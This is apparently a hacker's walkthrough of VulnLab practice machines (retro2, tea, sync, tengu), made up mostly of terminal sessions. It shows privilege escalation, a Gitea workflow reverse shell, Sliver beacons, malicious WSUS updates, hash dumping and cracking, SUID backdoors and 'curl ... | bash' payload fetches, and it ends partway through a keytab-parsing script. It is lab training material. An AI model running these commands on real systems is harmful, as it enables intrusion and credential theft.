┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ netexec smb retro2.vl -u 'fs01$' -p 'P@ssw0rd' SMB 10.10.122.16 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) SMB 10.10.122.16 445 BLN01 [+] retro2.vl\fs01$:P@ssw0rd
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ net rpc password 'ADMWS01$' Passw0rd1 -U retro2.vl/'fs01$'%P@ssw0rd -S bln01.retro2.vl
.
┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb retro2.vl -u 'ADMWS01$' -p 'P@ssw0rd'
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [-] retro2.vl\ADMWS01$:P@ssw0rd STATUS_LOGON_FAILURE
That failure is just a typo on our side: the reset set the ADMWS01$ password to Passw0rd1, which is what we use from here on.
Using the new ADMWS01$ password, we add ldapreader to the Services group with bloodyAD:
┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD] └─$ python3 bloodyAD.py --host 10.10.122.16 -d retro2.vl -u 'ADMWS01$' -p 'Passw0rd1' add groupMember 'SERVICES' 'ldapreader' [+] ldapreader added to SERVICES
Services members can RDP to BLN01, so now we can RDP in as ldapreader (the old 2008 R2 TLS stack needs /tls-seclevel:0):
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ xfreerdp /u:'ldapreader' /p:'pp<redacted>5R' /v:10.10.122.16 /d:retro2.vl /tls-seclevel:0
Privesc
The DC is Windows Server 2008 R2, so Perfusion (by itm4n) applies: any local user can create a Performance subkey under a service's registry key and then leverage the Windows Performance Counters to load an arbitrary DLL in the context of the WMI service as NT AUTHORITY\SYSTEM (hence the tool's name).
c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/Perfusion.exe Perfusion.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
c:\temp>.\Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_2844_2224_2.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[!] Failed to delete Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
c:\temp>whoami
nt authority\system
c:\temp>type c:\users\administrator\desktop\root.txt
VL{fc<redacted>46}
That was old-school fun. Note that the exploit could not delete its Performance registry key, so that artifact stays behind; on a real engagement remove it by hand.
vulnlab-tea
A medium-rated AD chain. srv.tea.vl runs a Gitea instance with an active Actions runner; after registering a user and enabling Actions on our own repository we can run commands on the runner and get a reverse shell. From there, Get-LapsADPassword gives us the local Administrator password of SRV, and SharpWSUS on the WSUS server (SRV) pushes a malicious update to dc.tea.vl, which gets us domain admin.
.
Gitea build
Create the file .gitea/workflows/demo.yaml in the repository we created:
http://srv.tea.vl:3000/puck/puck/src/branch/main/.gitea/workflows/demo.yaml
name: Build
run-name: ${{ gitea.actor }} running build job
on: [push]
jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: echo "🍏 This job's status is ${{ job.status }}."
      - run: powershell -e <base64-encoded reverse shell, omitted>
catch with netcat
┌──(puck㉿kali)-[~/vulnlab/tea] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.191.134] 50061 PS C:\Users\thomas.wallace\.cache\act\63805091085fb29f\hostexecutor> whoami tea\thomas.wallace
download & execute Beacon
PS C:\_install> iwr http://10.8.2.138:8000/beacon.exe -o beacon.exe
PS C:\_install> ./beacon.exe
Sliver
┌──(puck㉿kali)-[~/vulnlab/tea] └─$ sliver Connecting to localhost:31337 ... [*] Loaded 21 aliases from disk [*] Loaded 128 extension(s) from disk ███████╗██╗ ██╗██╗ ██╗███████╗██████╗ ██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗ ███████╗██║ ██║██║ ██║█████╗ ██████╔╝ ╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗ ███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║ ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝ All hackers gain vigilance [*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df [*] Welcome to the sliver shell, please type 'help' for options [*] Check for updates with the 'update' command sliver > https --lport 8443 [*] Starting HTTPS :8443 listener ... [*] Successfully started job #1 sliver > jobs ID Name Protocol Port Stage Profile ==== ======= ========== ====== =============== 1 https tcp 8443 sliver > generate beacon --seconds 5 --jitter 3 --os windows --arch amd64 --format EXECUTABLE --http 10.8.2.138:8443 --name tea-3 --save /tmp/beacon.exe -G --skip-symbols [*] Generating new windows/amd64 beacon implant binary (5s) [!] 
Symbol obfuscation is disabled [*] Build completed in 2s [*] Implant saved to /tmp/beacon.exe sliver > jobs ID Name Protocol Port Stage Profile ==== ======= ========== ====== =============== 1 https tcp 8443 [*] Beacon 9d553a10 tea-3 - 10.10.191.134:50348 (SRV) - windows/amd64 - Tue, 20 Aug 2024 10:25:18 CEST sliver > use 9d553a10 [*] Active beacon tea-3 (9d553a10-504e-4b41-927f-34a21b1a94bc) sliver (tea-3) > ls [*] Tasked beacon tea-3 (2cdcbb9d) [+] tea-3 completed task 2cdcbb9d C:\_install (6 items, 24.0 MiB) =============================== -rw-rw-rw- beacon.exe 10.5 MiB Tue Aug 20 01:16:47 -0700 2024 -rw-rw-rw- beacon2.exe 10.5 MiB Tue Aug 20 01:24:56 -0700 2024 -rw-rw-rw- LAPS.x64.msi 1.1 MiB Sun Dec 24 06:37:30 -0700 2023 -rw-rw-rw- LAPS_OperationsGuide.docx 626.3 KiB Sun Dec 24 06:37:39 -0700 2023 -rw-rw-rw- PsExec64.exe 813.9 KiB Sun Oct 22 06:03:38 -0700 2023 -rw-rw-rw- PsInfo64.exe 523.4 KiB Sun Dec 24 06:38:30 -0700 2023 sliver (tea-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup [*] Tasked beacon tea-3 (6338fcbb) [+] tea-3 completed task 6338fcbb [*] sharp-hound-4 output: 2024-08-20T01:27:54.2810142-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound 2024-08-20T01:27:54.9376664-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices --snip-- 2024-08-20T01:28:41.7584223-07:00|INFORMATION|Status: 309 objects finished (+309 6.866667)/s -- Using 69 MB RAM 2024-08-20T01:28:41.7687327-07:00|INFORMATION|Enumeration finished in 00:00:45.8844244 2024-08-20T01:28:41.8847345-07:00|INFORMATION|Saving cache with stats: 250 ID to type mappings. 254 name to SID mappings. 2 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2024-08-20T01:28:41.9476974-07:00|INFORMATION|SharpHound Enumeration Completed at 1:28 AM on 8/20/2024! 
Happy Graphing! [*] Output saved to /tmp/sharp-hound-4_.3130027413.log sliver (tea-3) > ls [*] Tasked beacon tea-3 (3f00e892) [+] tea-3 completed task 3f00e892 C:\_install (8 items, 24.0 MiB) =============================== -rw-rw-rw- 20240820012840_BloodHound.zip 23.2 KiB Tue Aug 20 01:28:41 -0700 2024 -rw-rw-rw- beacon.exe 10.5 MiB Tue Aug 20 01:16:47 -0700 2024 -rw-rw-rw- beacon2.exe 10.5 MiB Tue Aug 20 01:24:56 -0700 2024 -rw-rw-rw- LAPS.x64.msi 1.1 MiB Sun Dec 24 06:37:30 -0700 2023 -rw-rw-rw- LAPS_OperationsGuide.docx 626.3 KiB Sun Dec 24 06:37:39 -0700 2023 -rw-rw-rw- NjdkNDliNTgtOWQ5Mi00ZTViLWI2NzctOWJlODE4OTM4ZGMy.bin 42.8 KiB Tue Aug 20 01:28:41 -0700 2024 -rw-rw-rw- PsExec64.exe 813.9 KiB Sun Oct 22 06:03:38 -0700 2023 -rw-rw-rw- PsInfo64.exe 523.4 KiB Sun Dec 24 06:38:30 -0700 2023 sliver (tea-3) > download 20240820012840_BloodHound.zip [*] Tasked beacon tea-3 (d8c023fe) [+] tea-3 completed task d8c023fe [*] Wrote 23731 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/tea/20240820012840_BloodHound.zip sliver (tea-3) > ┌──(puck㉿kali)-[~/vulnlab/tea]
.
sliver (tea-3) > interactive [*] Using beacon's active C2 endpoint: https://10.8.2.138:8443 [*] Tasked beacon tea-3 (d48d0ac7) [*] Session 67a7541b tea-3 - 10.10.163.246:53086 (SRV) - windows/amd64 - Thu, 22 Aug 2024 09:21:51 CEST sliver (tea-3) > use 67a7541b-db54-4c92-a36a-b6baec828a14 [*] Active session tea-3 (67a7541b-db54-4c92-a36a-b6baec828a14) sliver (tea-3) > shell ? This action is bad OPSEC, are you an adult? Yes [*] Wait approximately 10 seconds after exit, and press <enter> to continue [*] Opening shell tunnel (EOF to exit) ... [*] Started remote shell with pid 4600 PS C:\_install> Get-LAPSADPassword -Identity SRV -AsPlainText Get-LAPSADPassword -Identity SRV -AsPlainText ComputerName : SRV DistinguishedName : CN=SRV,OU=Servers,DC=tea,DC=vl Account : Administrator Password : %t50Z))o4+0Z;6 PasswordUpdateTime : 8/21/2024 11:53:03 PM ExpirationTimestamp : 9/20/2024 11:53:03 PM Source : EncryptedPassword DecryptionStatus : Success AuthorizedDecryptor : TEA\Server Administration PS C:\_install>
Get-LapsADPassword succeeds because our user is an authorized decryptor (AuthorizedDecryptor: TEA\Server Administration). Windows LAPS rotates the password when it expires (see ExpirationTimestamp), so re-read it if it stops working.
netexec winrm srv.tea.vl -u administrator -p 'rr<redacted>S9' --local WINRM 10.10.191.134 5985 SRV [*] Windows Server 2022 Build 20348 (name:SRV) (domain:tea.vl) WINRM 10.10.191.134 5985 SRV [+] SRV\administrator:rr<redacted>S9 (Pwn3d!)
.
evil-winrm -i srv.tea.vl -u administrator -p 'rr<redacted>S9'
or
xfreerdp /u:Administrator /p:rr<redacted>S9 /w:1566 /h:968 /v:srv.tea.vl:3389
Not done yet: SRV is also the WSUS server (port 8530, as SharpWSUS's enumeration below confirms) that dc.tea.vl pulls updates from, and we are local admin on it, so we can push a fake update to the DC.
iwr http://10.8.2.138:8000/SharpWSUS.exe -o sharpwsus.exe
.
SharpWSUS (the /args quoting must escape the inner quotes as \" so cmd.exe passes the whole command to psexec; the payload path must exist on the WSUS server)
sharpwsus locate
sharpwsus inspect
sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \"net user puck Password123! /add && net localgroup administrators puck /add\"" /title:"Great UpdateC21" /date:2024-08-23 /kb:700123 /rating:Important /description:"Really important update" /url:"https://google.com"
sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"
sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl
sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"
.
.
C:\_install>sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21" ____ _ __ ______ _ _ ____ / ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___| \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) | |____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team [*] Action: Create Update C:\WSUS-Updates\WsusContent [*] Creating patch to use the following: [*] Payload: psexec64.exe [*] Payload Path: C:\Users\Administrator\Documents\psexec64.exe [*] Arguments: -accepteula -s -d cmd.exe /c \net [*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \net ################# WSUS Server Enumeration via SQL ################## ServerName, WSUSPortNumber, WSUSContentLocation ----------------------------------------------- SRV, 8530, C:\WSUS-Updates\WsusContent ImportUpdate Update Revision ID: 198781 PrepareXMLtoClient InjectURL2Download DeploymentRevision PrepareBundle PrepareBundle Revision ID: 198782 PrepareXMLBundletoClient DeploymentRevision [*] Update created - When ready to deploy use the following command: [*] SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name" [*] To check on the update status use the following command: [*] SharpWSUS.exe check /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN [*] To delete the update use the following command: [*] SharpWSUS.exe delete /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name" [*] Create complete There is no such global user or group: puck. There is no such global user or group: " /title:Great. There is no such global user or group: UpdateC21. More help is available by typing NET HELPMSG 3783. 
C:\_install>SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:dc.tea.vl /groupname:"Group1" ____ _ __ ______ _ _ ____ / ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___| \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) | |____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team [*] Action: Approve Update C:\WSUS-Updates\WsusContent Targeting dc.tea.vl TargetComputer, ComputerID, TargetID ------------------------------------ dc.tea.vl, 216d99cd-2257-41e7-9687-2163fb7e39f7, 1 Group Exists = False Group Created: Group1 Added Computer To Group Approved Update [*] Approve complete C:\_install>
Note the errors at the end of the create output: the escaped quotes inside /args were mangled by cmd.exe, so the embedded arguments were cut off at "\net" and the rest of the command line (net user puck ...) ran locally on SRV instead of going into the update. The update that was eventually approved and applied on dc.tea.vl created the account puckie / Start123! used below; that corrected re-run is not shown.
┌──(puck㉿kali)-[~/vulnlab] └─$ netexec smb dc.tea.vl -u puckie -p 'Start123!' SMB 10.10.145.21 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False) SMB 10.10.145.21 445 DC [+] tea.vl\puckie:Start123! (Pwn3d!)
.
Finally, RDP to the DC with the new account:
xfreerdp /u:puckie /p:'Start123!' /w:1566 /h:968 /v:dc.tea.vl:3389
.
Dump the domain hashes:
impacket-secretsdump 'tea/puckie:Start123!@dc.tea.vl' > allhashes.txt
This was super fun.
.
vulnlab-sync
An easy Linux box.
nmap scan
# Nmap 7.93 scan initiated Mon Aug 19 11:03:10 2024 as: nmap -A -oN sync.nmap 10.10.93.172 Nmap scan report for 10.10.93.172 Host is up (0.023s latency). Not shown: 996 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4b1533cc6cce0953f8f37d3b082785fa (ECDSA) |_ 256 18fd36c6a505b196147283f862d53821 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-title: Login | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.52 (Ubuntu) 873/tcp open rsync (protocol version 31) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Aug 19 11:03:18 2024 -- 1 IP address (1 host up) scanned in 8.51 seconds
List the anonymous rsync modules:
rsync -av --list-only rsync://10.10.93.172/
Pull the httpd module, which holds the website's source:
rsync -av rsync://10.10.93.172:873/httpd ./rsyn_shared
.
In the source we find that passwords are stored as md5("$secure|$username|$password"): the secure value and the username act as a salt prefixed to the password. In hashcat's hash:salt notation the entry for triss is:
a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|
hashcat mode 20, md5($salt.$pass), cracks it:
hashcat -a 0 -m 20 hash.txt /usr/share/wordlists/rockyou.txt -o crackedtriss.txt
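The mapping from the application's hashing scheme to hashcat's hash:salt input is the part that is easy to get wrong (mode 20 is salt-then-password, mode 10 would be password-then-salt). The Python below is an added example, not code from the original post: it reproduces the app's hash, emits and parses the hashcat line, and runs a dictionary attack over a constructed wordlist. The secure value is the one shown on the page; the password "sunflower" and the wordlist are constructed so the run is self-contained and offline.

```python
import hashlib

# Application scheme: md5("<secure>|<username>|<password>").
# For hashcat that is -m 20, md5($salt.$pass), with "<secure>|<username>|" as the salt.


def app_hash(secure, username, password):
    """Reproduce the application's password hash."""
    return hashlib.md5(f"{secure}|{username}|{password}".encode()).hexdigest()


def to_hashcat_line(digest, secure, username):
    """Emit the hash:salt form that hashcat -m 20 expects."""
    return f"{digest}:{secure}|{username}|"


def parse_hashcat_line(line):
    """Split hash:salt back into digest, secure value and username."""
    digest, salt = line.strip().split(":", 1)
    secure, username, trailer = salt.split("|")
    if trailer != "":
        raise ValueError("salt must end with the '|' that precedes the password")
    return digest, secure, username


def crack(line, wordlist):
    """Dictionary attack on one hash:salt line; returns the password or None."""
    digest, secure, username = parse_hashcat_line(line)
    for candidate in wordlist:
        if app_hash(secure, username, candidate) == digest:
            return candidate
    return None


# Constructed sample: page's secure value, a made-up password, a tiny wordlist.
SAMPLE_SECURE = "6c4972f3717a5e881e282ad3105de01e"
SAMPLE_LINE = to_hashcat_line(app_hash(SAMPLE_SECURE, "triss", "sunflower"), SAMPLE_SECURE, "triss")
SAMPLE_WORDLIST = ["password", "123456", "triss", "sunflower", "geralt"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, SAMPLE_WORDLIST))
```

For a real run, feed `SAMPLE_LINE`-shaped lines to hashcat as in the command above; this script is only fast enough to sanity-check that your salt layout is right before burning GPU time on rockyou.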
We can now FTP in as triss with the cracked password, create a .ssh folder in the home directory and upload our public key there as authorized_keys:
┌──(puck㉿kali)-[~/vulnlab/sync] └─$ ftp 10.10.93.172 Connected to 10.10.93.172. 220 (vsFTPd 3.0.5) Name (10.10.93.172:puck): triss 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||41121|) 150 Here comes the directory listing. drwxr-x--- 2 1003 1003 4096 Apr 21 2023 . drwxr-x--- 2 1003 1003 4096 Apr 21 2023 .. lrwxrwxrwx 1 0 0 9 Apr 21 2023 .bash_history -> /dev/null -rw-r--r-- 1 1003 1003 220 Apr 19 2023 .bash_logout -rw-r--r-- 1 1003 1003 3771 Apr 19 2023 .bashrc -rw-r--r-- 1 1003 1003 807 Apr 19 2023 .profile 226 Directory send OK. ftp> mkdir .ssh 257 "/.ssh" created ftp> cd .ssh 250 Directory successfully changed. ftp> put authorized_keys local: authorized_keys remote: authorized_keys 229 Entering Extended Passive Mode (|||6569|) 150 Ok to send data. 100% |************************************************************************| 91 612.87 KiB/s 00:00 ETA 226 Transfer complete. 91 bytes sent in 00:00 (2.32 KiB/s) ftp> ls 229 Entering Extended Passive Mode (|||65353|) 150 Here comes the directory listing. -rw------- 1 1003 1003 91 Aug 19 09:11 authorized_keys 226 Directory send OK.
.
ssh -i ed_25519 triss@10.10.93.172
In /etc/passwd we find another user, jennifer; su jennifer works with the same password as triss.
In /backup there is a zip file owned by root that gets regenerated periodically; pspy shows the job that creates it:
timeout 60s ./pspy64
Get the zip; it contains copies of /etc/passwd and /etc/shadow:
wget http://10.8.2.138:8000/1698154321.zip
Combine passwd and shadow:
$ unshadow passwd shadow > unshadow
Crack the result with john:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow
The cracked password belongs to sa, who has write permission on /usr/local/bin/backup.sh, the script the root job runs. Append a line that sets the SUID bit on /bin/bash and check the script:
echo "chmod +s /bin/bash" >> /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash
mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
chmod +s /bin/bash
Wait a minute for the job to run, then start a SUID shell:
/bin/bash -p
bash-5.1# id
uid=1001(sa) gid=1001(sa) euid=0(root) egid=0(root) groups=0(root),1001(sa)
bash-5.1#
that’s all
vulnlab-tengu
A medium-rated chain with an Ubuntu VM (nodered), sql.tengu.vl and dc.tengu.vl, all domain-joined.
Path: noderedsh.py for a shell on nodered -> extract the machine account hash from /etc/krb5.keytab -> read the gMSA password -> abuse constrained delegation to get a ticket for MSSQLSvc -> log in with mssqlclient.py and impersonate -> read the domain admin password with SharpDPAPI.
node-red exploit [initial access]
A Node-RED instance listens on port 1880 without authentication. We create a flow that executes a reverse shell on the target system (noderedsh.py automates this):
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ python3 noderedsh.py http://10.10.139.247:1880
[+] Node-RED does not require authentication.
[+] Establishing RCE link ....
> whoami
nodered_svc
> curl http://10.8.2.138/s.sh | bash
.
python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.139.247 - - [09/Aug/2024 14:21:42] "GET /s.sh HTTP/1.1" 200 -
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ nc -nlvp 9001 listening on [any] 9001 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.139.247] 48442 sh: 0: can't access tty; job control turned off $ whoami nodered_svc $ python3 -c 'import pty;pty.spawn("/bin/bash")' nodered_svc@nodered:/opt/nodered/.node-red$ export TERM=xterm export TERM=xterm nodered_svc@nodered:/opt/nodered/.node-red$ zsh: suspended rlwrap nc -nlvp 443
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ stty raw -echo;fg [1] + continued rlwrap nc -nlvp 443 nodered_svc@nodered:/opt/nodered/.node-red$ nodered_svc@nodered:/tmp$ wget http://10.8.2.138/chisel nodered_svc@nodered:/tmp$ chmod +x chisel nodered_svc@nodered:/tmp$ ./chisel client 10.8.2.138:8000 R:socks
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ chisel server -p 8000 --reverse 2024/08/14 09:18:49 server: Reverse tunnelling enabled 2024/08/14 09:18:49 server: Fingerprint DGcMxm0MtWpKPEJ5EPKN8UyvmAiowDGpTHgWZHQCdOc= 2024/08/14 09:18:49 server: Listening on http://0.0.0.0:8000 2024/08/14 09:20:49 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains crackmapexec mssql sql.tengu.vl -u nodered_connector -p 'DreamPuppy<redacted25>' --local-auth [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... sql.tengu.vl:1433 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... sql.tengu.vl:445 ... OK MSSQL sql.tengu.vl 1433 SQL [*] Windows Server 2022 Build 20348 (name:SQL) (domain:SQL) [proxychains] Strict chain ... 127.0.0.1:1080 ... sql.tengu.vl:1433 ... OK MSSQL sql.tengu.vl 1433 SQL [+] nodered_connector:DreamPuppy<redacted>25
.
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 sqsh -S 10.10.139.246 -U 'nodered_connector' -P 'DreamPuppy<redacted>25'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.139.246:1433 ... OK
1> show databases;
2> use prod;
3> go
Msg 911, Level 16, State 1
Server 'SQL', Line 2
Database 'prod' does not exist. Make sure that the name is entered correctly.
1> select table_name from systable
2> go
Msg 208, Level 16, State 1
Server 'SQL', Line 1
Invalid object name 'systable'.
1> SELECT * FROM Dev.INFORMATION_SCHEMA.TABLES;
2> go -m vert
TABLE_CATALOG: Dev
TABLE_SCHEMA: dbo
TABLE_NAME: Task
TABLE_TYPE: BASE TABLE
(1 row affected)
1> ...
1> SELECT name FROM master.dbo.sysdatabases;
2> go -m vert
name: master
name: tempdb
name: model
name: msdb
name: Demo
name: Dev
(6 rows affected)
1> use Demo;
2> go
1> select * from users;
2> go -m vert
ID: NULL
Username: t2_m.winters
Password: af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147
(1 row affected)
1>
.
crackstation.net resolves this hash to Tengu123.
Checking credentials
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 -q crackmapexec ldap dc.tengu.nl -u 't2_m.winters' -p 'Tengu123' SMB dc.tengu.nl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False) [proxychains] Strict chain ... 127.0.0.1:1080 ... DC.tengu.vl:389 ... OK LDAP dc.tengu.nl 389 DC [+] tengu.vl\t2_m.winters:Tengu123
Getting krb5.keytab
As the nodered box is domain-joined, /etc/krb5.keytab holds the keys of its machine account NODERED$ (the file is normally readable only by root). The rc4-hmac key in it is that account's NT hash, so it can be used for pass-the-hash. KeyTabExtract (https://github.com/sosdave/KeyTabExtract) pulls the keys out:
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ python3 keytabextract.py krb5.keytab [*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash. [*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction. [*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction. [+] Keytab File successfully imported. REALM : TENGU.VL SERVICE PRINCIPAL : NODERED$/ NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49 AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096 AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f
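What KeyTabExtract does is a plain parse of the MIT keytab format: a 0x0502 header, then length-prefixed entries carrying the principal, a timestamp, the encryption type and the raw key, where the 16-byte rc4-hmac key is literally the NT hash. The Python below is an added example, not code from the original post or from KeyTabExtract; it writes and parses a keytab of that layout. The keytab it parses is constructed inline (realm and principal names follow the page, the key bytes are dummies), so it runs offline; point `parse_keytab` at the bytes of a real /etc/krb5.keytab to use it for real.

```python
import struct

ENCTYPE_NAMES = {
    17: "aes128-cts-hmac-sha1-96",
    18: "aes256-cts-hmac-sha1-96",
    23: "rc4-hmac",
}


def _cos(raw):
    """MIT keytab counted_octet_string: big-endian uint16 length + bytes."""
    return struct.pack(">H", len(raw)) + raw


def build_keytab(entries):
    """Write a v2 (0x0502) keytab from (realm, components, enctype, key, kvno, timestamp) tuples."""
    out = b"\x05\x02"
    for realm, components, enctype, key, kvno, timestamp in entries:
        body = struct.pack(">H", len(components)) + _cos(realm.encode())
        for comp in components:
            body += _cos(comp.encode())
        body += struct.pack(">IIB", 1, timestamp, kvno & 0xFF)  # name_type, timestamp, vno8
        body += struct.pack(">HH", enctype, len(key)) + key     # keyblock
        body += struct.pack(">I", kvno)                         # optional 32-bit kvno
        out += struct.pack(">i", len(body)) + body
    return out


def _read_cos(data, pos):
    n, = struct.unpack_from(">H", data, pos)
    return data[pos + 2:pos + 2 + n], pos + 2 + n


def parse_keytab(data):
    """Parse a v2 keytab into dicts with principal, enctype, kvno, timestamp and hex key."""
    if data[:2] != b"\x05\x02":
        raise ValueError("only keytab format version 2 (0x0502) is handled here")
    pos, entries = 2, []
    while pos + 4 <= len(data):
        size, = struct.unpack_from(">i", data, pos)
        pos += 4
        if size < 0:                       # negative size marks a deleted slot
            pos += -size
            continue
        end = pos + size
        ncomp, = struct.unpack_from(">H", data, pos)
        pos += 2
        realm, pos = _read_cos(data, pos)
        components = []
        for _ in range(ncomp):
            comp, pos = _read_cos(data, pos)
            components.append(comp.decode())
        _name_type, timestamp, vno8 = struct.unpack_from(">IIB", data, pos)
        pos += 9
        enctype, klen = struct.unpack_from(">HH", data, pos)
        pos += 4
        key = data[pos:pos + klen]
        pos += klen
        kvno = vno8
        if end - pos >= 4:                 # 32-bit kvno overrides vno8 when present
            kvno, = struct.unpack_from(">I", data, pos)
        pos = end
        entries.append({
            "principal": "/".join(components) + "@" + realm.decode(),
            "enctype": ENCTYPE_NAMES.get(enctype, str(enctype)),
            "kvno": kvno,
            "timestamp": timestamp,
            "key": key.hex(),
        })
    return entries


def ntlm_hashes(entries):
    """rc4-hmac keys are the account's NT hash: what netexec -H / impacket -hashes accept."""
    return {e["principal"]: e["key"] for e in entries if e["enctype"] == "rc4-hmac"}


# Constructed sample keytab for a domain-joined host; key bytes are dummies.
SAMPLE_KEYTAB = build_keytab([
    ("TENGU.VL", ["NODERED$"], 23, bytes(range(16)), 3, 1723200000),
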